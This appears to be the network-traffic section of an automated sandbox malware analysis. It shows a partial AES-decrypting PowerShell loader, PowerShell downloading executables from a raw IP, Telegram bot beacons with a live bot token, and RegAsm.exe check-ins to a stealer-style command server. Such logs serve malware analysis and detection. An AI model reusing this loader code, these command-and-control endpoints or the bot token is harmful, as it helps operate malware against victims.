                                                                                              Data Raw: 0d 0a 24 59 6d 62 41 20 3d 20 27 7a 7a 66 62 64 65 36 33 48 59 4b 6c 61 4e 30 54 6f 6c 6f 6d 78 48 70 64 67 51 73 45 46 50 53 73 4b 49 51 4e 6e 2b 5a 54 45 69 77 3d 27 0d 0a 24 53 47 62 35 20 3d 20 27 63 6f 33 44 38 75 64 37 53 47 30 50 6b 4a 6c 6b 62 57 42 46 78 51 3d 3d 27 0d 0a 24 32 66 4a 70 20 3d 20 27 6f 30 58 57 35 5a 37 2b 2f 55 6b 41 54 42 58 38 73 54 79 4e 4f 39 4c 4c 63 41 4a 47 73 6f 67 34 5a 2b 34 37 6e 70 35 69 47 35 6d 79 65 42 51 4b 47 61 37 4f 69 53 47 61 73 70 36 4e 69 7a 45 54 42 58 48 6e 6b 49 6c 63 2f 4a 33 38 61 50 4c 6f 6e 50 2f 70 47 66 33 48 71 36 36 2b 32 62 76 2f 63 66 70 73 68 68 63 58 38 48 6d 70 70 65 7a 46 46 6e 6e 4f 77 6c 73 42 4c 44 41 63 4c 49 4a 79 79 73 46 52 6a 71 61 39 63 74 65 72 51 32 74 4d 48 4a 45 45 76 2b 62 43 6d 2b 79 73 35 52 4c 64 6a 44 57 49 6e 59 36 75 75 46 56 69 68 5a 4c 71 6b 64 63 33 49 64 39 6a 63 4e 4d 73 4c 71 47 48 54 38 63 6b 6e 50 43 69 37 77 6b 72 55 52 2f 6d 6a 43 30 47 67 6b 30 6c 77 79 34 62 78 64 52 41 63 77 43 62 6d 6d 4a 30 65 70 33 [TRUNCATED]
                                                                                              Data Ascii: $YmbA = 'zzfbde63HYKlaN0TolomxHpdgQsEFPSsKIQNn+ZTEiw='$SGb5 = 'co3D8ud7SG0PkJlkbWBFxQ=='$2fJp = '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'function etCc ($azvH, $YmbA, $SGb5) { $NWby = [Convert]::FromBase64String($YmbA) $zlhV = [Convert]::FromBase64String($SGb5) $aWSD = [Convert]::FromBase64String($azvH) $GyiY = [System.Security.Cryptography.Aes]::Create() $GyiY.Key = $NWby [TRUNCATED]
                                                                                              Dec 27, 2024 22:33:08.709646940 CET | 561 | IN |
                                                                                              Data Ascii: V $GyiY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $KR29 = $GyiY.CreateDecryptor($GyiY.Key, $GyiY.IV) $aHGE = New-Object System.IO.MemoryStream(, $aWSD) $dqtj = New-Object System.Security.Cryptography.Crypt


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              7 | 192.168.2.4 | 49741 | 147.45.44.131 | 80 | 7760 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Dec 27, 2024 22:33:08.738042116 CET | 157 | OUT | GET /infopage/hgfpj.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.082636118 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:09 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 16:22:08 GMT
                                                                                              ETag: "4c000-62a1aa1957b5c"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 311296
                                                                                              Content-Type: application/x-msdos-program


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              8 | 192.168.2.4 | 49742 | 147.45.44.131 | 80 | 7824 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Dec 27, 2024 22:33:08.738132954 CET | 157 | OUT | GET /infopage/hgfpj.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.040410995 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:09 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 16:22:08 GMT
                                                                                              ETag: "4c000-62a1aa1957b5c"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 311296
                                                                                              Content-Type: application/x-msdos-program


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              9 | 192.168.2.4 | 49743 | 147.45.44.131 | 80 | 7880 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Dec 27, 2024 22:33:08.783274889 CET | 181 | OUT | GET /infopage/hgfpj.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Connection: Keep-Alive
                                                                                              Dec 27, 2024 22:33:10.088680029 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:09 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 16:22:08 GMT
                                                                                              ETag: "4c000-62a1aa1957b5c"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 311296
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdos-program


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              10 | 192.168.2.4 | 49744 | 147.45.44.131 | 80 | 6588 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Dec 27, 2024 22:33:09.281054974 CET | 181 | OUT | GET /infopage/ubvsd.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Connection: Keep-Alive
                                                                                              Dec 27, 2024 22:33:10.585994005 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:10 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 00:05:52 GMT
                                                                                              ETag: "8e00-62a0cfe2cdd29"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 36352
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdos-program
                                                                                              Dec 27, 2024 22:33:12.571594000 CET | 157 | OUT | GET /infopage/hgfpj.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Dec 27, 2024 22:33:12.982350111 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:12 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 16:22:08 GMT
                                                                                              ETag: "4c000-62a1aa1957b5c"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 311296
                                                                                              Content-Type: application/x-msdos-program


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              0 | 192.168.2.4 | 49730 | 149.154.167.220 | 443 | 6512 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:32:57 UTC | 328 | OUT | POST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 0
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-27 21:32:58 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Fri, 27 Dec 2024 21:32:58 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 250
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              2024-12-27 21:32:58 UTC | 250 | IN | Data Ascii: {"ok":true,"result":{"message_id":1881,"from":{"id":7453569667,"is_bot":true,"first_name":"Stuk","username":"stukloader_bot"},"chat":{"id":7654016235,"first_name":"Elizabet","last_name":"Te","type":"private"},"date":1735335178,"text":"FileStarted!"}}


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              1 | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | 5300 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:32:57 UTC | 328 | OUT | POST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 0
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-27 21:32:58 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Fri, 27 Dec 2024 21:32:58 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 250
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              2024-12-27 21:32:58 UTC | 250 | IN | Data Ascii: {"ok":true,"result":{"message_id":1880,"from":{"id":7453569667,"is_bot":true,"first_name":"Stuk","username":"stukloader_bot"},"chat":{"id":7654016235,"first_name":"Elizabet","last_name":"Te","type":"private"},"date":1735335178,"text":"FileStarted!"}}


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              2 | 192.168.2.4 | 49731 | 149.154.167.220 | 443 | 3752 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:32:57 UTC | 328 | OUT | POST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 0
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-27 21:32:58 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Fri, 27 Dec 2024 21:32:58 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 250
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              2024-12-27 21:32:58 UTC | 250 | IN | Data Ascii: {"ok":true,"result":{"message_id":1882,"from":{"id":7453569667,"is_bot":true,"first_name":"Stuk","username":"stukloader_bot"},"chat":{"id":7654016235,"first_name":"Elizabet","last_name":"Te","type":"private"},"date":1735335178,"text":"FileStarted!"}}


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              3 | 192.168.2.4 | 49733 | 149.154.167.220 | 443 | 7476 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:32:59 UTC | 328 | OUT | POST /bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted! HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: api.telegram.org
                                                                                              Content-Length: 0
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-27 21:33:00 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Fri, 27 Dec 2024 21:33:00 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 250
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              2024-12-27 21:33:00 UTC | 250 | IN | Data Ascii: {"ok":true,"result":{"message_id":1883,"from":{"id":7453569667,"is_bot":true,"first_name":"Stuk","username":"stukloader_bot"},"chat":{"id":7654016235,"first_name":"Elizabet","last_name":"Te","type":"private"},"date":1735335180,"text":"FileStarted!"}}


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              4 | 192.168.2.4 | 49745 | 104.21.60.24 | 443 | 6424 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:13 UTC | 261 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:13 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-12-27 21:33:13 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:13 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=2oph71c3sel71hso5odme3vt2c; expires=Tue, 22 Apr 2025 15:19:52 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OmmJp%2FhlSuL%2FWCgaV1aeg%2FAJcRYnFkomkjVteC%2FJUTrKCDnwoDwYIRYBMAUBtatrck3AIrXy9bBj1yKdLqyf76lNr%2BungG0tbesXn9o%2FhZ%2FgqmV6kwjZLKQgn37Xlcxrbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d7efad55e6c-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1673&rtt_var=644&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=905&delivery_rate=1677197&cwnd=237&unsent_bytes=0&cid=47209a9686d52d27&ts=776&x=0"
                                                                                              2024-12-27 21:33:13 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-27 21:33:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              5 | 192.168.2.4 | 49746 | 104.21.60.24 | 443 | 7552 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:13 UTC | 261 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:13 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-12-27 21:33:14 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:13 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=1234ibl11t21ig4k2evuak9dlc; expires=Tue, 22 Apr 2025 15:19:52 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=94yZa9yPcGyva%2FTXafhMQLPhzNrD1Lxj138RE1fRMIjqG%2BU2LkhJC79RhhJOZo5Fk1mReMi6agnW6atyMm20uQZXaZyLpcaktaCUcjKK7U0%2Fl9ILT5tztT%2FC5bLRl5uk9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d7fbff243d3-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1916&min_rtt=1911&rtt_var=727&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1493606&cwnd=236&unsent_bytes=0&cid=09b7c63d55555585&ts=1007&x=0"
                                                                                              2024-12-27 21:33:14 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-27 21:33:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              6 | 192.168.2.4 | 49747 | 104.21.60.244 | 443 | 7548 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:13 UTC | 261 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:13 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-12-27 21:33:14 UTC | 1131 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:13 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=6bk1tb5m6ch4l3l8cgea5cak5c; expires=Tue, 22 Apr 2025 15:19:52 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2B8bQBl4vJwNEi%2F%2BUPBzWPJgMcdrT4NlT6uNSvBO2Id66hmzYqoWV29t8%2Fy8V9ojgWiXt8lQgAN8sL%2FACeWlORaNFEzo52q1GI%2FZ57aLUeEhJ4hT7ZNUfYpCtdBOeQItVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d7fec4e8ca8-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2130&min_rtt=2030&rtt_var=961&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=905&delivery_rate=1031802&cwnd=162&unsent_bytes=0&cid=a364ae49f83ee0b6&ts=988&x=0"
                                                                                              2024-12-27 21:33:14 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-27 21:33:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              7 | 192.168.2.4 | 49750 | 104.21.60.244 | 443 | 7548 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:15 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 52
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:15 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 26 6a 3d
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=VC6Dfm--TestOtctuk&j=
                                                                                              2024-12-27 21:33:16 UTC | 1135 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:16 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=b4gm06ntp6fivthrqfu0a6ciu3; expires=Tue, 22 Apr 2025 15:19:55 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ykw%2BNEBMQrc8gvCjHXNbAsNDPnXbKSoL3yOIGtWdwcHL6%2Bfnfmni39Dy7%2F0tqKBny1IRXgMniuDloncExtZgGpSZP2SV%2B%2F%2BT%2B6t%2FNo0NoKgTMtSNa1CQNoP4X79QMwoFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d8e6984429d-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2098&min_rtt=2049&rtt_var=868&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=950&delivery_rate=1192810&cwnd=246&unsent_bytes=0&cid=e24a550f5921ae6d&ts=779&x=0"


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              8 | 192.168.2.4 | 49751 | 104.21.60.244 | 443 | 7552 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2024-12-27 21:33:15 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 52
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:15 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 26 6a 3d
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=VC6Dfm--TestOtctuk&j=
                                                                                              2024-12-27 21:33:16 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:16 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=ah9cjbsb6e1l8qbt3t3h8nglg0; expires=Tue, 22 Apr 2025 15:19:55 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kwjnUvTJzRQDPt2s%2BPEHcj8ULg%2FYOvQ9z6ELrz3KjcVMVZEs1xJHVkoIqff3ox3vSg68a7C7MKAH22J8O9zCE2BPsqOGU%2BlcbTQP3hssscC8dBpWCelLQG2r9U3pUgFplg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6d8e79b38cba-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1989&rtt_var=770&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=950&delivery_rate=1400479&cwnd=218&unsent_bytes=0&cid=dd506907f5001ed0&ts=784&x=0"
                                                                                              Data Ascii: i7ZoePSIGA1UynrFu5FG6AOLRi3K+NKKLxkW2p2TFXnDs+o9s0/TzVTYfxR9gEZoUh5Ur8+6Uky9S0VYm0eDKokzbTr3zViPlMn4hrlTRmoAy4e9mKtQzi8cltDZR8apCHUpf+bLSAhHCbvX7cBHaYDJRK6LOlJIO4lHGpnBx+tKNi47NA9aCpQL/Ea/VNe40gmCvZ0rXIn7DoYL18aDrEk0r+kxHx3eFsto0evRxGkCy4TvyDgQSn5Kx1pZAYN
